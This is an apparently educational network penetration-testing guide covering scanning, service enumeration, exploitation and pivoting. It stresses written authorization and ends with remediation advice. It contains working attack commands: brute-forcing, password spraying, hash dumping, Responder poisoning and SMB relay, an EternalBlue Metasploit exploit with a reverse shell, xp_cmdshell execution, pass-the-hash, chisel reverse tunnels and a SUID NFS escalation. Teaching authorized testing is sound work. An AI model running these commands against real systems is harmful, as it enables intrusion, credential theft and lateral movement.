Network Penetration Testing: From Nmap Scan to Pivoting Deep Into the Network

Most companies lock their front door but leave the side windows open. A network penetration test finds those windows — open ports running outdated services, misconfigured protocols, credentials reused across the infrastructure, and segmentation gaps that let an attacker pivot from a compromised workstation all the way to domain controllers.

TL;DR

Network pentesting follows a structured methodology: discovery → enumeration → vulnerability analysis → exploitation → post-exploitation → pivoting

Nmap is the foundation; learn it deeply before reaching for specialized tools

The most impactful findings come from: default credentials, unpatched services, misconfigured SMB/NFS/SNMP, and overly permissive network segmentation

Pivoting and tunneling let you reach internal segments from a compromised host — this is where network pentests reveal their real value

Document everything: source IPs, timestamps, commands run, findings — your report is the deliverable

The Engagement Context

Before touching a packet, understand the scope:

Black box: No prior information — simulate an external attacker
Gray box: Some information provided (network ranges, domain names, maybe user accounts)
White box: Full access to architecture diagrams, configs, credentials — thorough but less realistic

Get written authorization specifying:

In-scope IP ranges or CIDRs
Out-of-scope systems (production databases, critical infrastructure)
Permitted test windows (business hours vs. 24/7)
Point of contact in case something breaks

This isn’t optional. Without authorization, network testing is illegal in every jurisdiction.

Phase 1: Discovery — Find What’s Alive

Passive Reconnaissance

Before sending a single packet to the target, gather intelligence:

# DNS enumeration
dig @8.8.8.8 target.com any
dig @8.8.8.8 target.com MX
fierce --domain target.com          # subdomain brute-force
subfinder -d target.com             # passive subdomain enumeration

# BGP/ASN lookup — find all IP ranges
whois AS12345
amass intel -org "Target Corp"

ICMP Host Discovery

The traditional ping sweep — fast but often blocked:

# Nmap ping sweep (no port scan)
nmap -sn 10.10.0.0/24

# Send ICMP echo requests without port scan
nmap -sn -PE 10.10.0.0/24

# When ICMP is blocked — ARP discovery (local network only)
nmap -sn -PR 192.168.1.0/24
arp-scan --localnet

TCP/UDP Discovery Without Full Scan

When you need to be quieter than a full port scan:

# SYN to common ports only — faster than full scan
nmap -sn --send-ip -PS22,80,443,3389,8080 10.10.0.0/24

# Use masscan for high-speed discovery across large ranges
masscan -p80,443,22,3389 10.0.0.0/8 --rate=10000 -oL masscan_results.txt

Phase 2: Port Scanning and Service Enumeration

The Nmap Baseline

# Standard scan — top 1000 ports, service detection, OS detection
nmap -sV -sC -O 10.10.0.100 -oA scan_baseline

# Full port scan — all 65535 ports
nmap -p- -T4 10.10.0.100 -oA scan_fullport

# UDP scan (slow but finds SNMP, DNS, TFTP, NTP)
nmap -sU -p 53,67,68,69,111,123,137,138,161,500 10.10.0.0/24

# Aggressive scan — everything at once
nmap -A -p- 10.10.0.100 -oA scan_aggressive

Nmap output formats:

-oN — human-readable
-oX — XML (import into Metasploit or reporting tools)
-oG — grepable
-oA — all three simultaneously

Service-Specific Enumeration

Once you know what’s running, enumerate each service deeply.

SMB is the most common source of critical findings in Windows environments.

# Enumerate shares, users, OS version
enum4linux-ng -A 10.10.0.100

# Nmap SMB scripts
nmap --script smb-enum-shares,smb-enum-users,smb-vuln-ms17-010 10.10.0.100

# Check for EternalBlue (MS17-010)
nmap --script smb-vuln-ms17-010 10.10.0.100

# List shares without credentials (null session)
smbclient -L //10.10.0.100 -N

# Connect to a share
smbclient //10.10.0.100/SharedDocs -N

# Mount the share
mount -t cifs //10.10.0.100/SharedDocs /mnt/smb -o guest

What to look for in SMB:

World-readable shares with sensitive documents (passwords, configs, HR data)
EternalBlue (MS17-010) — unauthenticated RCE
SMB signing disabled — enables relay attacks
NTLMv1 negotiation enabled — weak hash, crackable

FTP (21/TCP) — File Transfer Protocol

# Check for anonymous login
nmap --script ftp-anon 10.10.0.100
ftp 10.10.0.100  # username: anonymous, password: anything

# Check for bounce attacks, misconfigurations
nmap --script ftp-bounce,ftp-syst,ftp-vuln-cve2010-4221 10.10.0.100

Anonymous FTP access is an instant finding. Look for:

Configuration files
Backup archives
Database exports
Any file that shouldn’t be public

SSH (22/TCP)

# Check authentication methods and algorithms
nmap --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos 10.10.0.100

# Banner grab — version fingerprinting
nc 10.10.0.100 22

# Brute-force (only with explicit permission and rate limiting)
hydra -l root -P /opt/wordlists/rockyou.txt ssh://10.10.0.100 -t 4

Old SSH versions (OpenSSH < 7.x) have known vulnerabilities. Weak algorithms (MD5, RC4, DSS) are findings even without exploitation.

SNMP (161/UDP) — Network Management Protocol

Frequently forgotten, often configured with default community strings:

# Brute-force community strings
onesixtyone -c /usr/share/wordlists/metasploit/snmp_default_pass.txt 10.10.0.100

# Enumerate with default "public" community string
snmpwalk -v2c -c public 10.10.0.100
snmpwalk -v2c -c public 10.10.0.100 1.3.6.1.2.1.1      # system info
snmpwalk -v2c -c public 10.10.0.100 1.3.6.1.2.1.25.4.2  # running processes
snmpwalk -v2c -c public 10.10.0.100 1.3.6.1.4.1.77.1.2.25  # Windows users

# nmap SNMP scripts
nmap -sU -p 161 --script snmp-brute,snmp-info,snmp-interfaces 10.10.0.100

SNMP with public/private community strings exposes: system information, network interfaces, routing tables, ARP cache, running processes, and installed software — a complete picture of the host without authentication.

SMTP (25/587/TCP) — Email Server

# Enumerate valid users (VRFY, EXPN, RCPT TO)
smtp-user-enum -M VRFY -U /opt/wordlists/usernames.txt -t 10.10.0.100
nmap --script smtp-enum-users,smtp-open-relay 10.10.0.100

# Check for open relay (sends email for anyone)
telnet 10.10.0.100 25
EHLO test
MAIL FROM: <attacker@evil.com>
RCPT TO: <victim@target.com>
DATA
Subject: Test
.

Open mail relay = instant critical finding. Valid user enumeration enables targeted password attacks.

RDP (3389/TCP) — Remote Desktop

# Fingerprint RDP
nmap --script rdp-enum-encryption,rdp-vuln-ms12-020 10.10.0.100

# Check for BlueKeep (CVE-2019-0708) — unauthenticated RCE (older systems)
nmap --script rdp-vuln-ms12-020 10.10.0.100

# Screenshot RDP login screen without authentication
nmap --script rdp-screenshot 10.10.0.100

Database Services

# MySQL (3306)
nmap --script mysql-enum,mysql-info,mysql-empty-password 10.10.0.100
mysql -h 10.10.0.100 -u root -p    # try empty password, "root", "password"

# MSSQL (1433)
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-config 10.10.0.100
# xp_cmdshell if SA account is enabled:
impacket-mssqlclient sa:@10.10.0.100
SQL> EXEC xp_cmdshell 'whoami'

# PostgreSQL (5432)
nmap --script pgsql-brute 10.10.0.100
psql -h 10.10.0.100 -U postgres -W   # default credentials

# Redis (6379) — usually no auth
redis-cli -h 10.10.0.100
> INFO
> CONFIG GET *
> KEYS *

Databases exposed to the network with default or empty credentials are critical findings. MSSQL’s xp_cmdshell gives OS-level code execution directly from SQL.

Phase 3: Vulnerability Analysis

Automated Scanning

After manual enumeration, run a vulnerability scanner:

# Nessus (commercial, most comprehensive)
# OpenVAS (open source alternative)
# Nuclei — fast, template-based

# Nuclei with network templates
nuclei -l targets.txt -t network/ -o nuclei_results.txt

# Metasploit's vulns db_nmap integration
msfconsole
msf> db_nmap -sV -p- 10.10.0.100
msf> vulns

Don’t let automated scanners do your thinking. They miss context-specific vulnerabilities and generate false positives. Use them to augment manual enumeration, not replace it.

Searching for Known Exploits

# searchsploit — local Exploit-DB copy
searchsploit "OpenSSH 7.4"
searchsploit --cve CVE-2021-41773   # Apache path traversal

# Check NVD directly for CVE details
# Cross-reference version from Nmap -sV output with CVE databases

Phase 4: Exploitation

Credential Attacks

The most reliable path to initial access in internal network tests.

# Password spraying — one password against many users (avoid lockout)
crackmapexec smb 10.10.0.0/24 -u users.txt -p "Winter2026!" --continue-on-success

# Default credential check across all discovered services
crackmapexec smb 10.10.0.0/24 -u admin -p admin
hydra -C /opt/wordlists/default-credentials.txt ssh://10.10.0.100

# Hash dumping after gaining initial access
crackmapexec smb 10.10.0.100 -u admin -p password --sam   # SAM database
crackmapexec smb 10.10.0.100 -u admin -p password --lsa   # LSA secrets

# Crack captured hashes
hashcat -m 1000 -a 0 hashes.txt /opt/wordlists/rockyou.txt  # NTLM
hashcat -m 5600 -a 0 hashes.txt /opt/wordlists/rockyou.txt  # NTLMv2

LLMNR/NBT-NS Poisoning

When a Windows host can’t resolve a name via DNS, it broadcasts LLMNR/NBT-NS. An attacker on the local network can respond to these broadcasts and capture NTLMv2 hashes:

# Start Responder on the local interface
responder -I eth0 -rdwv

# Wait for authentication attempts — they come from:
# - Users navigating to non-existent shares (\\typo\share)
# - Misconfigured GPOs
# - Print spooler bugs

# Captured hashes appear in /opt/responder/logs/
# Crack or relay them

This is one of the highest-yield techniques in internal network tests — captured hashes can be cracked offline or relayed for immediate authentication.

SMB Relay Attack

Instead of cracking captured hashes, relay them directly to other hosts:

# Prerequisite: SMB signing disabled on target
crackmapexec smb 10.10.0.0/24 --gen-relay-list relay_targets.txt

# Set up ntlmrelayx to relay to targets
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -i

# Trigger capture with Responder (disable SMB/HTTP in Responder config)
responder -I eth0 -rdwv

# When a user connects to Responder, their hash is relayed to the target list
# On success: shell, secretsdump, or command execution

Exploiting Known CVEs

# EternalBlue — MS17-010 (Windows 7/2008 without patches)
msfconsole
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 10.10.0.100
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 10.10.0.1
msf> run

# Apache Log4j — log4shell
# PrintNightmare — CVE-2021-34527
# ProxyShell — Exchange CVE-2021-34473

Phase 5: Post-Exploitation and Pivoting

Getting initial access is one thing. Pivoting deeper into the network is where network pentests reveal their real value — demonstrating what an attacker can reach from a single compromised host.

Local Enumeration on Compromised Host

# Who are we, what can we do?
whoami /all
net user
net localgroup administrators

# Network interfaces and routing
ipconfig /all           # Windows
ip addr; ip route       # Linux

# What can we reach?
arp -a                   # local ARP cache — hosts we've spoken to
netstat -ano             # active connections and listening ports
route print              # routing table — what subnets are reachable?

Port Forwarding — Reach Services Behind a Host

You’ve compromised a host in the DMZ. The database server is in an internal subnet, reachable from the DMZ host but not from your attack machine.

SSH Local Port Forward:

# Forward local port 1433 through the DMZ host to the internal DB
ssh -L 1433:10.20.0.50:1433 user@dmz_host

# Now connect to the DB via localhost
mssqlclient.py sa:@localhost:1433

Chisel — works when SSH isn’t available:

# On attack machine (server)
chisel server --reverse --port 8080

# On compromised host (client)
chisel client 10.10.0.1:8080 R:1433:10.20.0.50:1433

# Now localhost:1433 on attack machine → internal DB

SOCKS Proxy — Route All Traffic Through a Compromised Host

A SOCKS proxy lets you use any tool through the compromised host as if your attack machine were on the internal network:

# SSH dynamic forwarding — creates SOCKS5 proxy on local port 1080
ssh -D 1080 user@compromised_host

# Use proxychains to route tools through the proxy
# Edit /etc/proxychains.conf: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 10.20.0.0/24   # scan internal subnet via pivot
proxychains crackmapexec smb 10.20.0.0/24 -u admin -p password

# Metasploit SOCKS plugin
msf> use auxiliary/server/socks_proxy
msf> set SRVPORT 1080
msf> run -j

Metasploit Pivoting

If you have a Meterpreter session, pivot is built in:

# Add a route to an internal subnet via the compromised session
msf> route add 10.20.0.0/24 1   # session 1 is the pivot host

# Now Metasploit routes traffic through the session
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 10.20.0.0/24
msf> run

# Or use socks proxy module for external tools
msf> use auxiliary/server/socks_proxy

Double Pivoting

Sometimes you need to pivot through two hosts to reach a deeply segmented network:

Attack Machine → DMZ Host → Internal Host → Core Network

# First pivot: SSH SOCKS proxy through DMZ host
ssh -D 1080 user@dmz_host

# Second pivot: SSH SOCKS proxy through internal host, tunneled via first proxy
proxychains ssh -D 1081 user@internal_host

# Now proxychains configured with port 1081 reaches the core network
proxychains4 nmap -sT -Pn 10.30.0.0/24

Credential Pivoting

Once you have credentials or hashes from one host, test them across the rest of the network:

# Pass-the-hash — authenticate with NTLM hash (no plaintext needed)
crackmapexec smb 10.10.0.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c --local-auth

# Password spraying with recovered credentials
crackmapexec smb 10.10.0.0/24 -u "john.smith" -p "Summer2026!"

Credential reuse across systems is one of the most common findings in network pentests. A single recovered password often unlocks dozens of hosts.

Common Critical Findings in Network Pentests

Finding	Discovery Method	Impact
EternalBlue (MS17-010)	`nmap --script smb-vuln-ms17-010`	Unauthenticated RCE
Default credentials on network devices	Manual testing, Hydra	Full device control
LLMNR/NBT-NS poisoning viable	Responder	NTLMv2 hash capture
SMB signing disabled	`crackmapexec --gen-relay-list`	SMB relay, code execution
SNMP public community string	`onesixtyone`, `snmpwalk`	Full host enumeration
Anonymous FTP with sensitive data	`nmap --script ftp-anon`	Data breach
Database with default/empty password	Manual testing	Full data access, OS command execution
Overly permissive network segmentation	Routing table analysis post-compromise	Lateral movement to all segments
Exposed Redis/MongoDB/Elasticsearch	Port scan + direct connection	Unauthenticated data access
NFS shares exported to `*`	`showmount -e`	File system access without authentication

NFS — Network File System Enumeration

Often forgotten, frequently misconfigured:

# List exported shares
showmount -e 10.10.0.100

# Mount a share (if exported to *)
mount -t nfs 10.10.0.100:/opt/backups /mnt/nfs

# If you have root on your attack machine and the NFS export allows root_squash=off:
# Create a SUID binary in the mounted share
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
# Execute on the target via another access vector to escalate

What You Can Do Today

If you’re a network security engineer:

Disable LLMNR and NBT-NS in Group Policy — it eliminates an entire attack category
Enforce SMB signing on all Windows hosts — prevents relay attacks
Audit network segmentation — can a workstation reach your core infrastructure directly?
Change all default credentials on network devices, printers, and management interfaces
Run nmap -sU -p 161 10.0.0.0/8 — find every SNMP device using default community strings

If you’re a penetration tester:

Don’t just scan the top 1000 ports — run a full -p- scan in parallel with enumeration
Responder first thing in internal tests — let it collect hashes while you enumerate
For pivoting, keep Chisel in your toolkit — it works when SSH and Metasploit can’t
Document your pivot chain in detail — the report needs to show the path from internet to crown jewels

If you’re a CISO:

Internal network pentests should be scoped to reach from “external attacker gets one workstation” to “how far can they go” — not just perimeter testing
Network segmentation effectiveness should be validated annually — policy and reality often diverge
Password spraying tests reveal credential hygiene — include it in your test scope

AD Attack Chains: From Initial Access to Domain Admin — network pentesting leads into Active Directory attacks; this is the full kill chain
OSINT and Recon Methodology: A Practical Guide for Security Professionals — reconnaissance before the first packet
LOLBins in 2026: How Attackers Use Windows Against Itself — post-exploitation techniques after gaining access via network pentesting
LSASS Dumping: Techniques, Evasion, and Detection — credential extraction post-compromise in network tests
Rapid Compromise Triage: First 10 Minutes on Linux and Windows — the defender’s response to what this article teaches attackers to do